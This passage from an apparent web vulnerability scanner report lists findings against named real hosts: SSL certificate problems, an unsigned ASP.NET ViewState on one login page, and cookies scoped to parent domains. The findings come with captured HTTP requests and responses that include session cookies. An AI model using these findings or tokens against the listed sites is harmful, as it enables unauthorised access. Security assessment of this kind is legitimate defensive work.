<td valign="top" align="left"><a href="http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/ItemDescription.html?Action=Cart_Item_Description&InvID_Web=3386&Template&#61;NANPA Gear&#38;MarketName_W&#61;&#38;MarketCode_W&#61;&#38;AuthorName_W&#61;&#38;PublisherName_W&#61;&#38;ISBN_W&#61;&#38;Start_W&#61;1&#38;End_W&#61;10&#38;NumToShow&#61;10&#38;Volume_W&#61;&#38;KeywordID_W&#61;&Time&#61;-1775933308&#38;SessionID&#61;123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s"><img src="http://www.resourcenter.net/Scripts/4Disapi3.dll/4DACTION/WebsGetImageThumb/Inventory/3386" alt="Camera Strap Forest Green" align="top" border="0">
...[SNIP]...
<div align="left">
                                   OP TECH Weight Reduction System Classic Camera strap with silkscreened NANPA logo ...<a href="http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/ItemDescription.html?Action=Cart_Item_Description&InvID_Web=3386&Template&#61;NANPA Gear&#38;MarketName_W&#61;&#38;MarketCode_W&#61;&#38;AuthorName_W&#61;&#38;PublisherName_W&#61;&#38;ISBN_W&#61;&#38;Start_W&#61;1&#38;End_W&#61;10&#38;NumToShow&#61;10&#38;Volume_W&#61;&#38;KeywordID_W&#61;&Time&#61;-1775933308&#38;SessionID&#61;123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s">More Info</a>
...[SNIP]...
<td valign="top" align="left"><a href="http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/ItemDescription.html?Action=Cart_Item_Description&InvID_Web=3387&Template&#61;NANPA Gear&#38;MarketName_W&#61;&#38;MarketCode_W&#61;&#38;AuthorName_W&#61;&#38;PublisherName_W&#61;&#38;ISBN_W&#61;&#38;Start_W&#61;1&#38;End_W&#61;10&#38;NumToShow&#61;10&#38;Volume_W&#61;&#38;KeywordID_W&#61;&Time&#61;-1775933308&#38;SessionID&#61;123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s"><img src="http://www.resourcenter.net/Scripts/4Disapi3.dll/4DACTION/WebsGetImageThumb/Inventory/3387" alt="Memory Card Case" align="top" border="0">
...[SNIP]...
<div align="left">
                                   Neoprene, belt loop, 7 laminated-mesh pockets. Made by Lowepro. ...<a href="http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/ItemDescription.html?Action=Cart_Item_Description&InvID_Web=3387&Template&#61;NANPA Gear&#38;MarketName_W&#61;&#38;MarketCode_W&#61;&#38;AuthorName_W&#61;&#38;PublisherName_W&#61;&#38;ISBN_W&#61;&#38;Start_W&#61;1&#38;End_W&#61;10&#38;NumToShow&#61;10&#38;Volume_W&#61;&#38;KeywordID_W&#61;&Time&#61;-1775933308&#38;SessionID&#61;123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s">More Info</a>
...[SNIP]...
<td valign="top" align="left"><a href="http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/ItemDescription.html?Action=Cart_Item_Description&InvID_Web=13155&Template&#61;NANPA Gear&#38;MarketName_W&#61;&#38;MarketCode_W&#61;&#38;AuthorName_W&#61;&#38;PublisherName_W&#61;&#38;ISBN_W&#61;&#38;Start_W&#61;1&#38;End_W&#61;10&#38;NumToShow&#61;10&#38;Volume_W&#61;&#38;KeywordID_W&#61;&Time&#61;-1775933308&#38;SessionID&#61;123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s"><img src="http://www.resourcenter.net/Scripts/4Disapi3.dll/4DACTION/WebsGetImageThumb/Inventory/13155" alt="NANPA Logo Window Static Cling Decal" align="top" border="0">
...[SNIP]...
<div align="left">
                                   Transparent NANPA Logo Window Static Cling Decal....<a href="http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/ItemDescription.html?Action=Cart_Item_Description&InvID_Web=13155&Template&#61;NANPA Gear&#38;MarketName_W&#61;&#38;MarketCode_W&#61;&#38;AuthorName_W&#61;&#38;PublisherName_W&#61;&#38;ISBN_W&#61;&#38;Start_W&#61;1&#38;End_W&#61;10&#38;NumToShow&#61;10&#38;Volume_W&#61;&#38;KeywordID_W&#61;&Time&#61;-1775933308&#38;SessionID&#61;123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s">More Info</a>
...[SNIP]...

10. SSL certificate
There are 6 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.



10.1. https://extranet.connexon.com/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://extranet.connexon.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:

The server presented the following certificates:

Server certificate

Issued to:  support.connexon.com
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Thu Sep 23 09:04:22 CDT 2010
Valid to:  Fri Aug 19 09:36:18 CDT 2011

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 CST 2006
Valid to:  Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Tue Jun 29 12:06:20 CDT 2004
Valid to:  Thu Jun 29 12:06:20 CDT 2034

10.2. https://gvnwlnp.com/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://gvnwlnp.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:

The server presented the following certificates:

Server certificate

Issued to:  www.gvnwlnp.com
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Thu Oct 01 16:59:32 CDT 2009
Valid to:  Sat Oct 01 16:17:56 CDT 2011

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 CST 2006
Valid to:  Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  http://www.valicert.com/
Valid from:  Tue Jun 29 12:06:20 CDT 2004
Valid to:  Sat Jun 29 12:06:20 CDT 2024

Certificate chain #3

Issued to:  http://www.valicert.com/
Issued by:  http://www.valicert.com/
Valid from:  Fri Jun 25 19:19:54 CDT 1999
Valid to:  Tue Jun 25 19:19:54 CDT 2019

10.3. https://lnp.activationnow.com/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://lnp.activationnow.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:

The server presented the following certificate:

Issued to:  lnp.activationnow.com
Issued by:  lnp.activationnow.com
Valid from:  Mon Aug 09 12:46:36 CDT 2004
Valid to:  Sun Sep 08 23:00:00 CDT 2024

10.4. https://catalyst.fastcatalog.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://catalyst.fastcatalog.net
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.fastcatalog.net
Issued by:  GeoTrust SSL CA
Valid from:  Tue Oct 12 22:01:03 CDT 2010
Valid to:  Thu Oct 15 06:12:18 CDT 2015

Certificate chain #1

Issued to:  GeoTrust SSL CA
Issued by:  GeoTrust Global CA
Valid from:  Fri Feb 19 16:39:26 CST 2010
Valid to:  Tue Feb 18 16:39:26 CST 2020

Certificate chain #2

Issued to:  GeoTrust Global CA
Issued by:  GeoTrust Global CA
Valid from:  Mon May 20 23:00:00 CDT 2002
Valid to:  Fri May 20 23:00:00 CDT 2022

10.5. https://support.connexon.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.connexon.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  support.connexon.com
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Thu Sep 23 09:04:22 CDT 2010
Valid to:  Fri Aug 19 09:36:18 CDT 2011

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 CST 2006
Valid to:  Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Tue Jun 29 12:06:20 CDT 2004
Valid to:  Thu Jun 29 12:06:20 CDT 2034

10.6. https://www.nationalnanpa.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nationalnanpa.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.nationalnanpa.com
Issued by:  Equifax Secure Certificate Authority
Valid from:  Wed Jan 27 00:46:28 CST 2010
Valid to:  Sat Jan 28 15:44:07 CST 2012

Certificate chain #1

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 11:41:51 CDT 1998
Valid to:  Wed Aug 22 11:41:51 CDT 2018

11. ASP.NET ViewState without MAC enabled

Summary

Severity:   Low
Confidence:   Certain
Host:   https://gvnwlnp.com
Path:   /login.aspx

Issue description

The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.

By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.

You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.

Issue remediation

There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.

Request

GET /login.aspx HTTP/1.1
Host: gvnwlnp.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=pf0wts55rdy2k0bdceo0lu45

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 00:50:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12113


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   LNP Login
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEwNTQyNzQyMzMPZBYCZg9kFgICAw9kFgICBQ9kFgICAQ9kFgJmD2QWAgINDxAPFgIeB0NoZWNrZWRoZGRkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUrY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRMb2dpbjEkUmVtZW1iZXJNZQ==" />
...[SNIP]...

12. Cookie scoped to parent domain
There are 13 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


12.1. http://www.secviz.org/node/89

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.secviz.org
Path:   /node/89

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /node/89 HTTP/1.1
Host: www.secviz.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:48:56 GMT
Server: Apache/2.2.17
Set-Cookie: SESS511f69598f6d24673b9cd181bd44c360=3679a5a8e5f156807fb4105e9bf204df; expires=Sat, 04-Jun-2011 04:22:16 GMT; path=/; domain=.secviz.org
Last-Modified: Wed, 11 May 2011 22:47:09 GMT
ETag: "13ef58d2264914230329c15df5277159"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Type: text/html; charset=utf-8
Content-Length: 17680

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title>The D
...[SNIP]...

12.2. http://ad.doubleclick.net/clk

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clk

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clk;225879025;40290099;m HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.vonage-forum.com/forum8.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.vonage.com/lp/US/afflpdc/?refer_id=AFLGN090801001W1&promo_id=USVONRP2499NSC_WEB&deviceType=VDV21_FREE_UPSELL
Set-Cookie: id=22fba3001601008d|2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; path=/; domain=.doubleclick.net; expires=Tue, 16 Apr 2013 20:37:40 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Thu, 12 May 2011 00:50:28 GMT
Server: GFE/2.0
Content-Type: text/html


12.3. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=7&c2=8097938&rn=662363118&c7=http%3A%2F%2Fseg.sharethis.com%2FgetSegment.php%3Fpurl%3Dhttp%253A%252F%252Fwww.redskye911.com%252Fe911_products%252F%26jsref%3Dhttp%253A%252F%252Fwww.redskye911.com%252F%26rnd%3D1305162438995&c3=8097938&c8=ShareThis%20Segmenter&c9=http%3A%2F%2Fwww.redskye911.com%2Fe911_products%2F&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fwww.redskye911.com%2Fe911_products%2F&jsref=http%3A%2F%2Fwww.redskye911.com%2F&rnd=1305162438995
Cookie: UID=7278cea-24.143.206.58-1297260492

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Thu, 12 May 2011 01:07:20 GMT
Connection: close
Set-Cookie: UID=7278cea-24.143.206.58-1297260492; expires=Sat, 11-May-2013 01:07:20 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


12.4. http://id.google.com/verify/EAAAANsBmSEnaufGrFO2VVQlXFg.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAANsBmSEnaufGrFO2VVQlXFg.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAANsBmSEnaufGrFO2VVQlXFg.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=number+porting+lnp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=46=ShaN536VX1BT-W8jSCkNsB7UCdsHHBFwvL-fv0GuHA=AXsz92cQ6dNvC4Zp; PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=THnvL1Oo2rFB1EyPuENlypklsUgiuRDrggMizX7GcvuSEWk1O1BRhP0HMsig4_tUMgrpgSA4JfKinmjR9Q08mpbqo9YLMeQa1bwUSS3rWNSNQKH_51QqwF1Bj_TupkUW

Response

HTTP/1.1 200 OK
Set-Cookie: NID=46=L7ViPyWtNgzLloKqxgGugf0ueZUZZRmZC8lN4Wr85n3qEmY_KVWo1yeYY5svbWvHVQq7yYmiauvxIuVqLhSFztFYtygC1RWC7aK_H70ahmu-9-agEoiTnLTH1Iyycesj; expires=Fri, 11-Nov-2011 00:43:59 GMT; path=/; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Thu, 12 May 2011 00:43:59 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

12.5. http://metrics.connectedplanetonline.com/b/ss/primediateleph/1/H.22.1/s8270624386612

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.connectedplanetonline.com
Path:   /b/ss/primediateleph/1/H.22.1/s8270624386612

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/primediateleph/1/H.22.1/s8270624386612?AQB=1&ndh=1&t=11%2F4%2F2011%2019%3A46%3A54%203%20300&ce=UTF-8&ns=pentonmedia&pageName=bss_oss%3Anews%3APurchase%20from%20Evolving%20Systems%20will%20broaden%20Neustar%20numbering%20solutions%20business&g=http%3A%2F%2Fconnectedplanetonline.com%2Fbss_oss%2Fnews%2Fpurchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422%2F&cc=USD&ch=bss_oss&events=event18%2Cevent1&c2=connectedplanetonline.com&c6=article&c7=%2Fbss_oss%2Fnews%2Fpurchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422%2Findex.html&c9=By%20Joan%20Engebretson&c10=Apr%2022%2C%202011%2012%3A42%20PM&c13=Anonymous&c51=did%20not%20bounce&v51=Media%20Visions&c52=Direct%20Traffic&v52=Software%20%26%20Technology%3A%20Electrical%20Components&c53=Direct%20Traffic&v53=10&v54=5065&v55=Birmingham%2C%20AL%20%20%2035210&v56=Not%20Defined&v57=D%3Dch&c58=D%3DpageName&v58=D%3DpageName&v60=D%3DUser-Agent&v61=%2B1&v64=D%3Dc53&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1065&bh=964&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.connectedplanetonline.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: intro=1; s_pers=%20s_visit%3D1%7C1305163014885%3B%20s_depth%3D1%7C1305163014886%3B%20s_dirL%3D1%7C1305163014889%3B; s_sess=%20s_cc%3Dtrue%3B%20s_cm%3DundefinedDirect%2520LoadDirect%2520Load%3B%20gpb_tdt%3DDirect%2520Traffic%3B

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 00:47:45 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E59718851D25A3-60000128800E6F4B[CE]; Expires=Tue, 10 May 2016 00:47:45 GMT; Domain=.connectedplanetonline.com; Path=/
Location: http://metrics.connectedplanetonline.com/b/ss/primediateleph/1/H.22.1/s8270624386612?AQB=1&pccr=true&vidn=26E59718851D25A3-60000128800E6F4B&&ndh=1&t=11%2F4%2F2011%2019%3A46%3A54%203%20300&ce=UTF-8&ns=pentonmedia&pageName=bss_oss%3Anews%3APurchase%20from%20Evolving%20Systems%20will%20broaden%20Neustar%20numbering%20solutions%20business&g=http%3A%2F%2Fconnectedplanetonline.com%2Fbss_oss%2Fnews%2Fpurchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422%2F&cc=USD&ch=bss_oss&events=event18%2Cevent1&c2=connectedplanetonline.com&c6=article&c7=%2Fbss_oss%2Fnews%2Fpurchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422%2Findex.html&c9=By%20Joan%20Engebretson&c10=Apr%2022%2C%202011%2012%3A42%20PM&c13=Anonymous&c51=did%20not%20bounce&v51=Media%20Visions&c52=Direct%20Traffic&v52=Software%20%26%20Technology%3A%20Electrical%20Components&c53=Direct%20Traffic&v53=10&v54=5065&v55=Birmingham%2C%20AL%20%20%2035210&v56=Not%20Defined&v57=D%3Dch&c58=D%3DpageName&v58=D%3DpageName&v60=D%3DUser-Agent&v61=%2B1&v64=D%3Dc53&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1065&bh=964&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Wed, 11 May 2011 00:47:45 GMT
Last-Modified: Fri, 13 May 2011 00:47:45 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www268
Content-Length: 0
Content-Type: text/plain


12.6. http://metrics.sprint.com/b/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.sprint.com
Path:   /b/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294?AQB=1&ndh=1&t=11%2F4%2F2011%2019%3A46%3A22%203%20300&ce=UTF-8&pageName=SU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint&g=http%3A%2F%2Fsupport.sprint.com%2Fsupport%2Farticle%2FBring_your_existing_number_to_Sprint%2Fcase-wh164052-20100420-140547&r=http%3A%2F%2Fshop2.sprint.com%2Fen%2Fsupport%2Ffaq%2Fwlnp.shtml&cc=USD&ch=Support&server=support.sprint.com&events=event14&h1=Support%7CSU%20%3A%20Services%7CSU%20%3A%20Articles&h2=D%3Dg&c3=Not%20Authenticated&c4=SU%20%3A%20Services&c9=not%20logged-in&v13=D%3Dc40&v14=D%3Dc9&v20=D%3Dc3&c21=case-wh164052-20100420-140547&v29=D%3Dc43&v30=D%3Dch&c40=SU%20%3A%20Articles&c42=Shockwave%20Flash%2010.2%20r154&c43=support.sprint.com&v44=34CE0D747C31107C188BD6527E05D4BF&c45=Support%2BSU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint&c46=7%3A30PM&c47=Wednesday&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1065&bh=964&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.sprint.com
Proxy-Connection: keep-alive
Referer: http://support.sprint.com/support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=34CE0D747C31107C188BD6527E05D4BF; TLisset=true; s_cc=true; gpv_p37=Support; gpv_p38=SU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 00:46:24 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E596F005010A07-4000010D201AEE12[CE]; Expires=Tue, 10 May 2016 00:46:24 GMT; Domain=.sprint.com; Path=/
Location: 